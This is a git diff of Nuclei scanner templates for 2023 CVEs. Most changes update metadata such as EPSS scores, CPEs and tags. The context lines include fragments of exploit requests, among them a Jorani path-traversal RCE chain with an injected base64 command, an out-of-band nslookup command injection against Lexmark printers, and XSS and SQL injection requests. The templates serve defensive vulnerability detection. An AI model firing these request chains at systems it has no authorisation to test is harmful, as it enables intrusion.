index c6e7c3148f..e362f0e3bf 100644
--- a/http/cves/2023/CVE-2023-2178.yaml
+++ b/http/cves/2023/CVE-2023-2178.yaml
@@ -11,11 +11,20 @@ info:
- https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip
- https://nvd.nist.gov/vuln/detail/CVE-2023-2178
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 4.8
cve-id: CVE-2023-2178
+ cwe-id: CWE-79
+ epss-score: 0.00078
+ cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.32486
metadata:
max-request: 2
verified: true
- tags: cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated
+ framework: wordpress
+ vendor: aajoda
+ product: aajoda_testimonials
+ tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,xss,authenticated
http:
- raw:
@@ -25,7 +34,6 @@ http:
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
-
- |
POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1
Host: {{Hostname}}
diff --git a/http/cves/2023/CVE-2023-22478.yaml b/http/cves/2023/CVE-2023-22478.yaml
index 73a5bcfb62..3e56431e69 100644
--- a/http/cves/2023/CVE-2023-22478.yaml
+++ b/http/cves/2023/CVE-2023-22478.yaml
@@ -10,16 +10,23 @@ info:
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubePi/KubePi%20LoginLogsSearch%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22478.md
- https://nvd.nist.gov/vuln/detail/CVE-2023-22478
- https://github.com/1Panel-dev/KubePi/security/advisories/GHSA-gqx8-hxmv-c4v4
+ - https://github.com/KubeOperator/KubePi/commit/0c6774bf5d9003ae4d60257a3f207c131ff4a6d6
+ - https://github.com/KubeOperator/KubePi/releases/tag/v1.6.4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-22478
cwe-id: CWE-862
+ epss-score: 0.01048
+ cpe: cpe:2.3:a:fit2cloud:kubepi:*:*:*:*:*:*:*:*
+ epss-percentile: 0.82159
metadata:
max-request: 1
fofa-query: "kubepi"
shodan-query: html:"kubepi"
verified: true
+ vendor: fit2cloud
+ product: kubepi
tags: cve,cve2023,kubepi,k8s,exposure
http:
@@ -31,6 +38,7 @@ http:
Content-Type: application/json
{}
+
matchers-condition: and
matchers:
- type: word
diff --git a/http/cves/2023/CVE-2023-22480.yaml b/http/cves/2023/CVE-2023-22480.yaml
index 08aceb7382..e25685f1e9 100644
--- a/http/cves/2023/CVE-2023-22480.yaml
+++ b/http/cves/2023/CVE-2023-22480.yaml
@@ -10,16 +10,23 @@ info:
- https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1
- https://nvd.nist.gov/vuln/detail/CVE-2023-22480
+ - https://github.com/KubeOperator/KubeOperator/commit/7ef42bf1c16900d13e6376f8be5ecdbfdfb44aaf
+ - https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4
classification:
- cve-id: CVE-2023-22480
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
- cwe-id: CWE-863
+ cve-id: CVE-2023-22480
+ cwe-id: CWE-863,CWE-285
+ epss-score: 0.00724
+ cpe: cpe:2.3:a:fit2cloud:kubeoperator:*:*:*:*:*:*:*:*
+ epss-percentile: 0.78239
metadata:
max-request: 1
verified: true
shodan-query: html:"KubeOperator"
fofa-query: app="KubeOperator"
+ vendor: fit2cloud
+ product: kubeoperator
tags: cve,cve2023,kubeoperator,k8s,kubeconfig,exposure
http:
diff --git a/http/cves/2023/CVE-2023-22620.yaml b/http/cves/2023/CVE-2023-22620.yaml
index 6f1a1e1c89..a03b7606f5 100644
--- a/http/cves/2023/CVE-2023-22620.yaml
+++ b/http/cves/2023/CVE-2023-22620.yaml
@@ -18,8 +18,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-22620
cwe-id: CWE-863
- epss-score: 0.00597
+ epss-score: 0.00876
cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80371
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-2272.yaml b/http/cves/2023/CVE-2023-2272.yaml
index d46d385ea8..10fe61be34 100644
--- a/http/cves/2023/CVE-2023-2272.yaml
+++ b/http/cves/2023/CVE-2023-2272.yaml
@@ -15,9 +15,15 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-2272
cwe-id: CWE-79
+ epss-score: 0.00071
+ cpe: cpe:2.3:a:tiempo:tiempo:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.29286
metadata:
max-request: 2
verified: true
+ framework: wordpress
+ vendor: tiempo
+ product: tiempo
tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,authenticated,xss,tiempocom
http:
diff --git a/http/cves/2023/CVE-2023-22897.yaml b/http/cves/2023/CVE-2023-22897.yaml
index 93332f3777..2b20079304 100644
--- a/http/cves/2023/CVE-2023-22897.yaml
+++ b/http/cves/2023/CVE-2023-22897.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 6.5
cve-id: CVE-2023-22897
cwe-id: CWE-908
- epss-score: 0.00876
+ epss-score: 0.00853
cpe: cpe:2.3:o:securepoint:unified_threat_management:*:*:*:*:*:*:*:*
+ epss-percentile: 0.80108
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-23161.yaml b/http/cves/2023/CVE-2023-23161.yaml
index 16a784ec3a..8427d597e9 100644
--- a/http/cves/2023/CVE-2023-23161.yaml
+++ b/http/cves/2023/CVE-2023-23161.yaml
@@ -11,20 +11,22 @@ info:
- https://github.com/rahulpatwari/CVE/blob/main/CVE-2023-23161/CVE-2023-23161.txt
- https://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
- https://nvd.nist.gov/vuln/detail/CVE-2023-23161
+ - http://packetstormsecurity.com/files/171642/Art-Gallery-Management-System-Project-1.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-23161
cwe-id: CWE-79
- epss-score: 0.00048
+ epss-score: 0.00104
cpe: cpe:2.3:a:art_gallery_management_system_project:art_gallery_management_system:1.0:*:*:*:*:*:*:*
+ epss-percentile: 0.41822
metadata:
max-request: 1
verified: true
fofa-query: title="Art Gallery Management System"
vendor: art_gallery_management_system_project
product: art_gallery_management_system
- tags: cve,cve2023,art,gallery,xss
+ tags: packetstorm,cve,cve2023,art,gallery,xss
http:
- method: GET
diff --git a/http/cves/2023/CVE-2023-23333.yaml b/http/cves/2023/CVE-2023-23333.yaml
index 96cd410637..ffe056c0cb 100644
--- a/http/cves/2023/CVE-2023-23333.yaml
+++ b/http/cves/2023/CVE-2023-23333.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-23333
cwe-id: CWE-77
- epss-score: 0.6667
+ epss-score: 0.63981
cpe: cpe:2.3:o:contec:solarview_compact_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97411
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-23488.yaml b/http/cves/2023/CVE-2023-23488.yaml
index b8b4fac6a8..a08544daa1 100644
--- a/http/cves/2023/CVE-2023-23488.yaml
+++ b/http/cves/2023/CVE-2023-23488.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-23488
cwe-id: CWE-89
- epss-score: 0.03048
+ epss-score: 0.02173
cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.87935
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-23489.yaml b/http/cves/2023/CVE-2023-23489.yaml
index 2dbf4301d7..5f1d6c37c5 100644
--- a/http/cves/2023/CVE-2023-23489.yaml
+++ b/http/cves/2023/CVE-2023-23489.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-23489
cwe-id: CWE-89
- epss-score: 0.13445
+ epss-score: 0.22685
cpe: cpe:2.3:a:sandhillsdev:easy_digital_downloads:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.95881
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-23491.yaml b/http/cves/2023/CVE-2023-23491.yaml
index 9542b7aee4..d2b5caaae7 100644
--- a/http/cves/2023/CVE-2023-23491.yaml
+++ b/http/cves/2023/CVE-2023-23491.yaml
@@ -6,16 +6,25 @@ info:
severity: medium
description: |
The Quick Event Manager WordPress Plugin, version < 9.7.5, is affected by a reflected cross-site scripting vulnerability in the 'category' parameter of its 'qem_ajax_calendar' action.
- remediation: Fixed in version 9.7.5 and above
reference:
- https://wpscan.com/vulnerability/49178a9d-0500-4e3e-8ea1-6cd4eeda2a4e
- https://nvd.nist.gov/vuln/detail/CVE-2023-23491
+ remediation: Fixed in version 9.7.5 and above
classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
cve-id: CVE-2023-23491
+ cwe-id: CWE-79
+ epss-score: 0.00064
+ cpe: cpe:2.3:a:fullworksplugins:quick_event_manager:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
verified: true
publicwww-query: "/wp-content/plugins/quick-event-manager"
+ framework: wordpress
+ vendor: fullworksplugins
+ product: quick_event_manager
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,quick-event-manager
http:
diff --git a/http/cves/2023/CVE-2023-23492.yaml b/http/cves/2023/CVE-2023-23492.yaml
index dea063923d..3a9ae4c8c4 100644
--- a/http/cves/2023/CVE-2023-23492.yaml
+++ b/http/cves/2023/CVE-2023-23492.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.8
cve-id: CVE-2023-23492
cwe-id: CWE-89
- epss-score: 0.00776
+ epss-score: 0.03531
cpe: cpe:2.3:a:login_with_phone_number_project:login_with_phone_number:*:*:*:*:*:wordpress:*:*
+ epss-percentile: 0.90359
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-2356.yaml b/http/cves/2023/CVE-2023-2356.yaml
index 55f54e0dae..3753a87c20 100644
--- a/http/cves/2023/CVE-2023-2356.yaml
+++ b/http/cves/2023/CVE-2023-2356.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-2356
cwe-id: CWE-23
- epss-score: 0.00719
+ epss-score: 0.00941
cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
+ epss-percentile: 0.81132
metadata:
fofa-query: app="MLflow"
max-request: 3
diff --git a/http/cves/2023/CVE-2023-23752.yaml b/http/cves/2023/CVE-2023-23752.yaml
index 82b9881e4c..21acbee659 100644
--- a/http/cves/2023/CVE-2023-23752.yaml
+++ b/http/cves/2023/CVE-2023-23752.yaml
@@ -16,8 +16,9 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2023-23752
- epss-score: 0.61007
+ epss-score: 0.49602
cpe: cpe:2.3:a:joomla:joomla\!:*:*:*:*:*:*:*:*
+ epss-percentile: 0.97062
metadata:
max-request: 2
shodan-query: html:"Joomla! - Open Source Content Management"
diff --git a/http/cves/2023/CVE-2023-24044.yaml b/http/cves/2023/CVE-2023-24044.yaml
index ddf7539239..9895c9fd6d 100644
--- a/http/cves/2023/CVE-2023-24044.yaml
+++ b/http/cves/2023/CVE-2023-24044.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-24044
cwe-id: CWE-601
- epss-score: 0.00094
+ epss-score: 0.00114
cpe: cpe:2.3:a:plesk:obsidian:*:*:*:*:*:*:*:*
+ epss-percentile: 0.44165
metadata:
max-request: 1
fofa-query: title="Plesk Obsidian"
diff --git a/http/cves/2023/CVE-2023-24243.yaml b/http/cves/2023/CVE-2023-24243.yaml
index a193fd3b54..00e7770053 100644
--- a/http/cves/2023/CVE-2023-24243.yaml
+++ b/http/cves/2023/CVE-2023-24243.yaml
@@ -19,6 +19,7 @@ info:
cwe-id: CWE-918
epss-score: 0.00448
cpe: cpe:2.3:a:cdata:arc:*:*:*:*:*:*:*:*
+ epss-percentile: 0.71868
metadata:
fofa-query: icon_hash="163538942"
max-request: 1
diff --git a/http/cves/2023/CVE-2023-24278.yaml b/http/cves/2023/CVE-2023-24278.yaml
index 9d928e706d..85ccbc7c73 100644
--- a/http/cves/2023/CVE-2023-24278.yaml
+++ b/http/cves/2023/CVE-2023-24278.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.0009
cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:*
+ epss-percentile: 0.37279
metadata:
max-request: 1
shodan-query: http.favicon.hash:1099097618
diff --git a/http/cves/2023/CVE-2023-24322.yaml b/http/cves/2023/CVE-2023-24322.yaml
index c0197b526d..1be2ec92ab 100644
--- a/http/cves/2023/CVE-2023-24322.yaml
+++ b/http/cves/2023/CVE-2023-24322.yaml
@@ -18,6 +18,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00077
cpe: cpe:2.3:a:mojoportal:mojoportal:2.7.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.31519
metadata:
max-request: 1
shodan-query: html:"mojoPortal"
diff --git a/http/cves/2023/CVE-2023-24488.yaml b/http/cves/2023/CVE-2023-24488.yaml
index fa0520e11e..0ee4ed3fa9 100644
--- a/http/cves/2023/CVE-2023-24488.yaml
+++ b/http/cves/2023/CVE-2023-24488.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-24488
cwe-id: CWE-79
- epss-score: 0.01605
+ epss-score: 0.01498
cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:*
+ epss-percentile: 0.85239
metadata:
max-request: 2
shodan-query: title:"Citrix Gateway"
diff --git a/http/cves/2023/CVE-2023-24489.yaml b/http/cves/2023/CVE-2023-24489.yaml
index d7f470e7c5..e6129ff9b0 100644
--- a/http/cves/2023/CVE-2023-24489.yaml
+++ b/http/cves/2023/CVE-2023-24489.yaml
@@ -9,19 +9,21 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-24489
- https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/
+ - https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-24489
- cpe: cpe:2.3:a:citrix:sharefile_storagezones_controller:*:*:*:*:*:*:*:*
+ epss-score: 0.9673
+ cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99506
metadata:
max-request: 256
shodan-query: title:"ShareFile Storage Server"
verified: true
vendor: citrix
- product: sharefile_storagezones_controller
- tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz
-
+ product: sharefile_storage_zones_controller
+ tags: cve,cve2023,sharefile,rce,intrusive,fileupload,fuzz,kev
variables:
fileName: '{{rand_base(8)}}'
@@ -39,10 +41,8 @@ http:
}
-
payloads:
padding: helpers/payloads/citrix_paddings.txt
-
threads: 30
stop-at-first-match: true
matchers:
diff --git a/http/cves/2023/CVE-2023-24657.yaml b/http/cves/2023/CVE-2023-24657.yaml
index 3d6098c88c..8002023070 100644
--- a/http/cves/2023/CVE-2023-24657.yaml
+++ b/http/cves/2023/CVE-2023-24657.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00076
cpe: cpe:2.3:a:phpipam:phpipam:1.6:*:*:*:*:*:*:*
+ epss-percentile: 0.31252
metadata:
max-request: 2
shodan-query: html:"phpIPAM IP address management"
diff --git a/http/cves/2023/CVE-2023-24733.yaml b/http/cves/2023/CVE-2023-24733.yaml
index 6a10d12925..58e87e394a 100644
--- a/http/cves/2023/CVE-2023-24733.yaml
+++ b/http/cves/2023/CVE-2023-24733.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
shodan-query: http.favicon.hash:1469328760
diff --git a/http/cves/2023/CVE-2023-24735.yaml b/http/cves/2023/CVE-2023-24735.yaml
index 429d0f70a8..61c06145a3 100644
--- a/http/cves/2023/CVE-2023-24735.yaml
+++ b/http/cves/2023/CVE-2023-24735.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 6.1
cve-id: CVE-2023-24735
cwe-id: CWE-601
- epss-score: 0.01158
+ epss-score: 0.00985
cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:*
+ epss-percentile: 0.81565
metadata:
max-request: 1
shodan-query: http.favicon.hash:1469328760
diff --git a/http/cves/2023/CVE-2023-24737.yaml b/http/cves/2023/CVE-2023-24737.yaml
index b57d4eab3d..c0a520b74d 100644
--- a/http/cves/2023/CVE-2023-24737.yaml
+++ b/http/cves/2023/CVE-2023-24737.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00064
cpe: cpe:2.3:a:pmb_project:pmb:7.4.6:*:*:*:*:*:*:*
+ epss-percentile: 0.26173
metadata:
max-request: 1
shodan-query: http.favicon.hash:1469328760
diff --git a/http/cves/2023/CVE-2023-25135.yaml b/http/cves/2023/CVE-2023-25135.yaml
index 082b9dddda..9cc6fb796a 100644
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-25135
cwe-id: CWE-502
- epss-score: 0.65662
+ epss-score: 0.74668
cpe: cpe:2.3:a:vbulletin:vbulletin:5.6.7:-:*:*:*:*:*:*
+ epss-percentile: 0.97724
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-25157.yaml b/http/cves/2023/CVE-2023-25157.yaml
index 7d88fc7dcb..7574c6dc0c 100644
--- a/http/cves/2023/CVE-2023-25157.yaml
+++ b/http/cves/2023/CVE-2023-25157.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-25157
cwe-id: CWE-89
- epss-score: 0.49368
+ epss-score: 0.3525
cpe: cpe:2.3:a:osgeo:geoserver:*:*:*:*:*:*:*:*
+ epss-percentile: 0.96575
metadata:
max-request: 3
shodan-query: title:"geoserver"
diff --git a/http/cves/2023/CVE-2023-25346.yaml b/http/cves/2023/CVE-2023-25346.yaml
index affdceb27b..489e63406d 100644
--- a/http/cves/2023/CVE-2023-25346.yaml
+++ b/http/cves/2023/CVE-2023-25346.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00089
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
+ epss-percentile: 0.36851
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-25717.yaml b/http/cves/2023/CVE-2023-25717.yaml
index faf39ef52c..47a6952711 100644
--- a/http/cves/2023/CVE-2023-25717.yaml
+++ b/http/cves/2023/CVE-2023-25717.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 9.8
cve-id: CVE-2023-25717
cwe-id: CWE-94
- epss-score: 0.95567
+ epss-score: 0.96566
cpe: cpe:2.3:a:ruckuswireless:ruckus_wireless_admin:*:*:*:*:*:*:*:*
+ epss-percentile: 0.99438
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-26067.yaml b/http/cves/2023/CVE-2023-26067.yaml
index 9652861d74..1ef2d7949c 100644
--- a/http/cves/2023/CVE-2023-26067.yaml
+++ b/http/cves/2023/CVE-2023-26067.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 8.1
cve-id: CVE-2023-26067
cwe-id: CWE-20
- epss-score: 0.00145
+ epss-score: 0.02039
cpe: cpe:2.3:o:lexmark:cxtpc_firmware:*:*:*:*:*:*:*:*
+ epss-percentile: 0.87518
metadata:
max-request: 1
verified: true
@@ -26,8 +27,6 @@ info:
vendor: lexmark
product: cxtpc_firmware
tags: cve,cve2023,printer,iot,lexmark
-
-
variables:
cmd: 'nslookup {{interactsh-url}}'
@@ -47,4 +46,4 @@ http:
- contains(interactsh_protocol, 'dns')
- contains(body, 'Fax Trace Settings')
- status_code == 200
- condition: and
\ No newline at end of file
+ condition: and
diff --git a/http/cves/2023/CVE-2023-26255.yaml b/http/cves/2023/CVE-2023-26255.yaml
index 600226c91e..c91bcbc7f2 100644
--- a/http/cves/2023/CVE-2023-26255.yaml
+++ b/http/cves/2023/CVE-2023-26255.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-26255
cwe-id: CWE-22
- epss-score: 0.14359
+ epss-score: 0.14175
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
+ epss-percentile: 0.94985
metadata:
max-request: 1
shodan-query: title:Jira
diff --git a/http/cves/2023/CVE-2023-26256.yaml b/http/cves/2023/CVE-2023-26256.yaml
index 6e654a4214..138e152e24 100644
--- a/http/cves/2023/CVE-2023-26256.yaml
+++ b/http/cves/2023/CVE-2023-26256.yaml
@@ -15,8 +15,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-26256
cwe-id: CWE-22
- epss-score: 0.01245
+ epss-score: 0.00612
cpe: cpe:2.3:a:stagil:stagil_navigation:*:*:*:*:*:jira:*:*
+ epss-percentile: 0.76007
metadata:
max-request: 1
shodan-query: title:Jira
diff --git a/http/cves/2023/CVE-2023-26360.yaml b/http/cves/2023/CVE-2023-26360.yaml
index 07fe5eb98b..2c00123b54 100644
--- a/http/cves/2023/CVE-2023-26360.yaml
+++ b/http/cves/2023/CVE-2023-26360.yaml
@@ -16,8 +16,9 @@ info:
cvss-score: 8.6
cve-id: CVE-2023-26360
cwe-id: CWE-284
- epss-score: 0.85734
+ epss-score: 0.90844
cpe: cpe:2.3:a:adobe:coldfusion:2018:-:*:*:*:*:*:*
+ epss-percentile: 0.98442
metadata:
max-request: 1
shodan-query: http.component:"Adobe ColdFusion"
diff --git a/http/cves/2023/CVE-2023-26469.yaml b/http/cves/2023/CVE-2023-26469.yaml
index 865706cb4f..1ebcc32b1a 100644
--- a/http/cves/2023/CVE-2023-26469.yaml
+++ b/http/cves/2023/CVE-2023-26469.yaml
@@ -5,24 +5,28 @@ info:
author: pussycat0x
severity: critical
description: |
- Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
+ Jorani 1.0.0, an attacker could leverage path traversal to access files and execute code on the server.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-26469
- https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py
- https://github.com/advisories/GHSA-7r9h-9r47-7vjj
- http://packetstormsecurity.com/files/174248/Jorani-Remote-Code-Execution.html
+ - https://jorani.org/security-features-in-lms.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
+ cve-id: CVE-2023-26469
cwe-id: CWE-22
epss-score: 0.22328
cpe: cpe:2.3:a:jorani:jorani:1.0.0:*:*:*:*:*:*:*
+ epss-percentile: 0.95851
metadata:
max-request: 3
shodan-query: http.favicon.hash:-2032163853
verified: true
+ vendor: jorani
+ product: jorani
tags: cve,cve2023,jorani,rce,packetstorm
-
variables:
cmd: "id"
payload: ""
@@ -33,14 +37,12 @@ http:
- |
GET /session/login HTTP/1.1
Host: {{Hostname}}
-
- |
POST /session/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
csrf_test_jorani={{csrf}}&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login={{payload}}&CipheredValue=DummyPassword
-
- |
GET /pages/view/log-{{date_time("%Y-%M-%D")}} HTTP/1.1
Host: {{Hostname}}
@@ -48,6 +50,7 @@ http:
{{header}}: {{base64("echo ---------;{{cmd}} 2>&1;echo ---------;")}}
cookie-reuse: true
+
matchers-condition: and
matchers:
- type: regex
diff --git a/http/cves/2023/CVE-2023-26842.yaml b/http/cves/2023/CVE-2023-26842.yaml
index a942f017f6..56d1b12a28 100644
--- a/http/cves/2023/CVE-2023-26842.yaml
+++ b/http/cves/2023/CVE-2023-26842.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00148
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
+ epss-percentile: 0.50119
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-26843.yaml b/http/cves/2023/CVE-2023-26843.yaml
index a57eb88b65..2e1afdac65 100644
--- a/http/cves/2023/CVE-2023-26843.yaml
+++ b/http/cves/2023/CVE-2023-26843.yaml
@@ -17,6 +17,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00146
cpe: cpe:2.3:a:churchcrm:churchcrm:4.5.3:*:*:*:*:*:*:*
+ epss-percentile: 0.49905
metadata:
max-request: 2
verified: true
diff --git a/http/cves/2023/CVE-2023-27008.yaml b/http/cves/2023/CVE-2023-27008.yaml
index 802e556575..7e37877921 100644
--- a/http/cves/2023/CVE-2023-27008.yaml
+++ b/http/cves/2023/CVE-2023-27008.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-79
epss-score: 0.00081
cpe: cpe:2.3:a:atutor:atutor:2.2.1:*:*:*:*:*:*:*
+ epss-percentile: 0.33383
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-27034.yaml b/http/cves/2023/CVE-2023-27034.yaml
index 7983f0f4ab..2f5722fa01 100644
--- a/http/cves/2023/CVE-2023-27034.yaml
+++ b/http/cves/2023/CVE-2023-27034.yaml
@@ -1,4 +1,5 @@
id: CVE-2023-27034
+
info:
name: Blind SQL injection vulnerability in Jms Blog
author: MaStErChO
@@ -9,14 +10,21 @@ info:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27034
- https://security.friendsofpresta.org/modules/2023/03/13/jmsblog.html
- https://github.com/advisories/GHSA-7jr7-v6gv-m656
+ - https://friends-of-presta.github.io/security-advisories/modules/2023/03/13/jmsblog.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-27034
cwe-id: CWE-89
+ epss-score: 0.00572
+ cpe: cpe:2.3:a:joommasters:jms_blog:2.5.5:*:*:*:*:prestashop:*:*
+ epss-percentile: 0.75071
metadata:
max-request: 2
- tags: cve,cve2023,prestashop,prestashop-module,sqli
+ framework: prestashop
+ vendor: joommasters
+ product: jms_blog
+ tags: cve,cve2023,prestashop,prestashop-module,sqli,intrusive
http:
- raw:
@@ -54,12 +62,12 @@ http:
submitComment=
------------YWJkMTQzNDcw--
-
- |
GET /modules/jmsblog/config.xml HTTP/1.1
Host: {{Hostname}}
stop-at-first-match: true
+
matchers-condition: and
matchers:
- type: dsl
diff --git a/http/cves/2023/CVE-2023-27159.yaml b/http/cves/2023/CVE-2023-27159.yaml
index 57a97024b7..d907130349 100644
--- a/http/cves/2023/CVE-2023-27159.yaml
+++ b/http/cves/2023/CVE-2023-27159.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-27159
cwe-id: CWE-918
- epss-score: 0.00265
+ epss-score: 0.00262
cpe: cpe:2.3:a:appwrite:appwrite:*:*:*:*:*:*:*:*
+ epss-percentile: 0.63161
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-27179.yaml b/http/cves/2023/CVE-2023-27179.yaml
index cf354990bd..dedc8beb52 100644
--- a/http/cves/2023/CVE-2023-27179.yaml
+++ b/http/cves/2023/CVE-2023-27179.yaml
@@ -17,8 +17,9 @@ info:
cvss-score: 7.5
cve-id: CVE-2023-27179
cwe-id: CWE-434
- epss-score: 0.03179
+ epss-score: 0.03737
cpe: cpe:2.3:a:gdidees:gdidees_cms:*:*:*:*:*:*:*:*
+ epss-percentile: 0.9061
metadata:
max-request: 1
verified: true
diff --git a/http/cves/2023/CVE-2023-27292.yaml b/http/cves/2023/CVE-2023-27292.yaml
index 9936ff6ad8..09aea3ea9d 100644
--- a/http/cves/2023/CVE-2023-27292.yaml
+++ b/http/cves/2023/CVE-2023-27292.yaml
@@ -16,6 +16,7 @@ info:
cwe-id: CWE-601
epss-score: 0.00073
cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*
+ epss-percentile: 0.30323
metadata:
max-request: 2
shodan-query: title:"opencats"
